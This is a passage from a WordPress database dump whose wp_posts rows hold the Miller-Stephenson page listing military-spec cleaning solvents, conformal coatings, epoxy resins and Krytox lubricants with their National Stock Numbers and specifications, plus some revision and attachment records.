center;">8040-00-822-6430</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8030-01-312-1211</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">8040-00-040-5986</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-815c/">Epon Resin 815C</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8040-00-843-7873</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/"><strong>Release Agents / Dry Lubricants</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/">MS-122AD</a></td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">9150-01-528-5624</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-122xd/">MS-122XD</a></td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">9150-01-443-9003</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-143H</td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">9150-01-571-1708</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/"><strong>Krytox Performance Lubricants</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-143az/">Krytox 143AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Oil</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;">9150-01-106-1008</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ab/">Krytox 240AB</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td></td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-90</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">2 oz. Tube</td>\r\n<td style="text-align: center;">9150-01-088-0498</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-91</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;">9150-00-422-8066</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-91</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ad/">Krytox 240AD</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">8 oz. Tube</td>\r\n<td style="text-align: center;">9150-00-961-8995</td>\r\n<td style="text-align: center;">SM-C-806563</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-240ad/">Krytox 240AD</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">SM-C-806563</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240az/">Krytox 240AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">8 oz. Tube</td>\r\n<td style="text-align: center;">9150-01-007-4384</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-89</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240az/">Krytox 240AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td></td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-89</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nThese Military Specifications and National Stock Numbers are accurate to the best of our knowledge. However, because they change so rapidly without notice, it is recommended that they be verified before using. The Epoxy and Resin Systems which meet Mil Specs are certified only to the uncured systems.\r\n* Base Resin Conforms to Mil Spec', 'Miller-Stephenson Military Spec Products / NSN', '', 'publish', 'closed', 'closed', '', 'military-spec-chemicals', '', '', '2016-10-28 19:29:06', '2016-10-28 19:29:06', '', 0, 'https://www.miller-stephenson.com/?p=2773', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2774, 0, '2016-10-26 19:00:07', '2016-10-26 19:00:07', '', '', '', 'publish', 'closed', 'closed', '', '2774', '', '', '2016-10-26 19:00:07', '2016-10-26 19:00:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/2774/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2775, 0, '2016-10-26 19:02:10', '2016-10-26 19:02:10', '', '', '', 'publish', 'closed', 'closed', '', '2775', '', '', '2016-10-26 19:02:10', '2016-10-26 19:02:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/2775/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2776, 0, '2016-10-26 19:03:29', '2016-10-26 19:03:29', '', '', '', 'publish', 'closed', 'closed', '', '2776', '', '', '2016-10-26 19:03:29', '2016-10-26 19:03:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/2776/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2777, 2, '2016-10-26 20:01:22', '2016-10-26 20:01:22', '', 'Military Spec Chemicals', '', 'inherit', 'closed', 'closed', '', 'shutterstock_370106177', '', '', '2016-10-26 20:01:39', '2016-10-26 20:01:39', '', 2773, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_370106177.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2778, 2, '2016-10-26 20:02:42', '2016-10-26 20:02:42', '<h1><strong>Military Spec Chemicals and NSN</strong></h1>\r\nMiller-Stephenson offers a wide variety of military spec chemicals and lubrication products.\r\n\r\nWe carry:\r\n<ul>\r\n 	<li>Solvent Cleaners</li>\r\n 	<li>Solvent Flux Removers</li>\r\n 	<li>Contact Cleaner</li>\r\n 	<li>Conformal Coatings</li>\r\n 	<li>Specialty Products</li>\r\n 	<li>Epoxy Resins / Curings Agents</li>\r\n 	<li>Release Agents / Dry Lubricants</li>\r\n 	<li>Krytox Performance Lubricants</li>\r\n</ul>\r\nWe have:\r\n<ul>\r\n 	<li>Military Specifications (Mil-Spec)</li>\r\n 	<li>National Stock Numbers (NSN)</li>\r\n 	<li>Underwriters Laboratories (UL) Numbers</li>\r\n 	<li>Qualified Products List (QPL)</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/"><strong>Solvent Cleaners</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-720722/">MS-720</a></td>\r\n<td style="text-align: center;">Precision Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1819</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-755l/">MS-755</a></td>\r\n<td style="text-align: center;">Vertrel SMT Heavy Duty Solvent &amp; Flux Remover</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-521-5719</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-775</td>\r\n<td style="text-align: center;">Vertrel XE Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1809</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-780</td>\r\n<td style="text-align: center;">Vertrel XF Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-460-4914</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-mca/">Vertrel MCA</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5658</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-mca/">Vertrel MCA</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5661</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-smt/">Vertrel SMT</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5662</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-smt/">Vertrel SMT</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5664</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5659</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5660</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/solvsys/flux-removers/"><strong>Solvent Flux Removers</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-755l/">MS-755</a></td>\r\n<td style="text-align: center;">Vertrel SMT Heavy Duty Solvent &amp; Flux Remover</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-521-5719</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/solvsys/contact-cleaners/"><strong>Contact Cleaners</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/contact-re-nu/">MS-730</a></td>\r\n<td style="text-align: center;">Safezone Contact Re-Nu</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1815</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/"><strong>Conformal Coatings</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td width="206">Description</td>\r\n<td width="206">Container</td>\r\n<td width="206">National Stock Number (NSN)</td>\r\n<td width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/silicone-conformal-coatings/">MS-460H</a></td>\r\n<td>Silicone Conformal Coating, moisture and fungal resistance, for communications, electronic and associated electrical equipment</td>\r\n<td>Aerosol</td>\r\n<td>UL #746E</td>\r\n<td>MIL-I-46058C Type SR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/silicone-electronic-coating/">MS-462H</a></td>\r\n<td>Silicone Conformal Coating, moisture and fungal resistance, for communications, electronic and associated electrical equipment</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td>UL #746E</td>\r\n<td>MIL-I-46058C Type SR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/mil-spec-urethane-conformal-coating/">MS-470S</a></td>\r\n<td>Superior toughness and abrasion resistance and excellent protection for humidity and organic solvents. Includes an ultraviolet (UV) indicator.</td>\r\n<td>Aerosol</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type UR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-472s/">MS-472S</a></td>\r\n<td>Superior toughness and abrasion resistance and excellent protection for humidity and organic solvents. Includes an ultraviolet (UV) indicator.</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type UR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/acrylic-conformal-coatings/">MS-475C</a></td>\r\n<td>Acrylic Conformal Coating, moisture and fungus resistant, for communications, electronic, and associated electrical equipment</td>\r\n<td>Aerosol</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type AR*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/acrylic-conformal-coating-mil-spec/">MS-477C</a></td>\r\n<td>Acrylic Conformal Coating, moisture and fungus resistant, for communications, electronic, and associated electrical equipment</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type AR*</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/specialty-products/"><strong>Specialty Products</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/aeroduster-ms-222n/">MS-222N</a></td>\r\n<td style="text-align: center;">Aero-Duster</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-346-9144</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/cobra-duster/">MS-228</a></td>\r\n<td style="text-align: center;">Cobra Brush, Aerosol Attachment</td>\r\n<td style="text-align: center;">Kit</td>\r\n<td style="text-align: center;">7920-00-134-1998</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/quik-freeze/">MS-242N</a></td>\r\n<td style="text-align: center;">Quik-Freeze</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-333-1841</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/">MS-260</a></td>\r\n<td style="text-align: center;">Plastic/Glass/Metal Cleaner</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">7930-01-064-5179</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-381h/">MS-381H</a></td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-8521</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-381HUV</td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-367-8095</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-383H</td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">6850-01-538-3496</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/">MS-907</a></td>\r\n<td style="text-align: center;">Epoxy Adhesive Kit (Two Part)</td>\r\n<td style="text-align: center;">2-2 oz Tubes</td>\r\n<td style="text-align: center;">8040-00-144-9729</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/"><strong>Epoxy Resins / Curing Agents</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epikure-3125/">Epikure 3125</a></td>\r\n<td style="text-align: center;">Curing Agent Polyamide</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8040-00-139-4350</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epikure-3140/">Epikure 3140</a></td>\r\n<td style="text-align: center;">Curing Agent Polyamide</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">8040-01-498-4975</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Pint</td>\r\n<td style="text-align: center;">8030-00-086-1506</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">8040-00-822-6430</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8030-01-312-1211</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">8040-00-040-5986</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-815c/">Epon Resin 815C</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8040-00-843-7873</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/"><strong>Release Agents / Dry Lubricants</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/">MS-122AD</a></td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">9150-01-528-5624</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-122xd/">MS-122XD</a></td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">9150-01-443-9003</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-143H</td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">9150-01-571-1708</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Performance Lubricants</strong>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-143az/">Krytox 143AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Oil</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;">9150-01-106-1008</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ab/">Krytox 240AB</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td></td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-90</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">2 oz. Tube</td>\r\n<td style="text-align: center;">9150-01-088-0498</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-91</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;">9150-00-422-8066</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-91</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ad/">Krytox 240AD</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">8 oz. Tube</td>\r\n<td style="text-align: center;">9150-00-961-8995</td>\r\n<td style="text-align: center;">SM-C-806563</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-240ad/">Krytox 240AD</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">SM-C-806563</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240az/">Krytox 240AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">8 oz. Tube</td>\r\n<td style="text-align: center;">9150-01-007-4384</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-89</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240az/">Krytox 240AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td></td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-89</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nThese Military Specifications and National Stock Numbers are accurate to the best of our knowledge. However, because they change so rapidly without notice, it is recommended that they be verified before using. The Epoxy and Resin Systems which meet Mil Specs are certified only to the uncured systems.\r\n* Base Resin Conforms to Mil Spec', 'Miller-Stephenson Military Spec Products / NSN', '', 'inherit', 'closed', 'closed', '', '2773-revision-v1', '', '', '2016-10-26 20:02:42', '2016-10-26 20:02:42', '', 2773, 'https://www.miller-stephenson.com/2773-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2779, 2, '2016-10-26 20:03:52', '2016-10-26 20:03:52', '', 'Military Spec Chemicals', '', 'inherit', 'closed', 'closed', '', 'shutterstock_296498720', '', '', '2016-10-26 20:04:09', '2016-10-26 20:04:09', '', 2773, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_296498720.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2780, 2, '2016-10-26 20:09:02', '2016-10-26 20:09:02', '<h1><strong>Military Spec Chemicals and NSN</strong></h1>\r\nMiller-Stephenson offers a wide variety of military spec chemicals and lubrication products.\r\n\r\nWe carry:\r\n<ul>\r\n 	<li>Solvent Cleaners</li>\r\n 	<li>Solvent Flux Removers</li>\r\n 	<li>Contact Cleaner</li>\r\n 	<li>Conformal Coatings</li>\r\n 	<li>Specialty Products</li>\r\n 	<li>Epoxy Resins / Curings Agents</li>\r\n 	<li>Release Agents / Dry Lubricants</li>\r\n 	<li>Krytox Performance Lubricants</li>\r\n</ul>\r\nWe have:\r\n<ul>\r\n 	<li>Military Specifications (Mil-Spec)</li>\r\n 	<li>National Stock Numbers (NSN)</li>\r\n 	<li>Underwriters Laboratories (UL) Numbers</li>\r\n 	<li>Qualified Products List (QPL)</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/"><strong>Solvent Cleaners</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-720722/">MS-720</a></td>\r\n<td style="text-align: center;">Precision Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1819</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-755l/">MS-755</a></td>\r\n<td style="text-align: center;">Vertrel SMT Heavy Duty Solvent &amp; Flux Remover</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-521-5719</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-775</td>\r\n<td style="text-align: center;">Vertrel XE Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1809</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-780</td>\r\n<td style="text-align: center;">Vertrel XF Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-460-4914</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-mca/">Vertrel MCA</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5658</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-mca/">Vertrel MCA</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5661</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-smt/">Vertrel SMT</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5662</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a 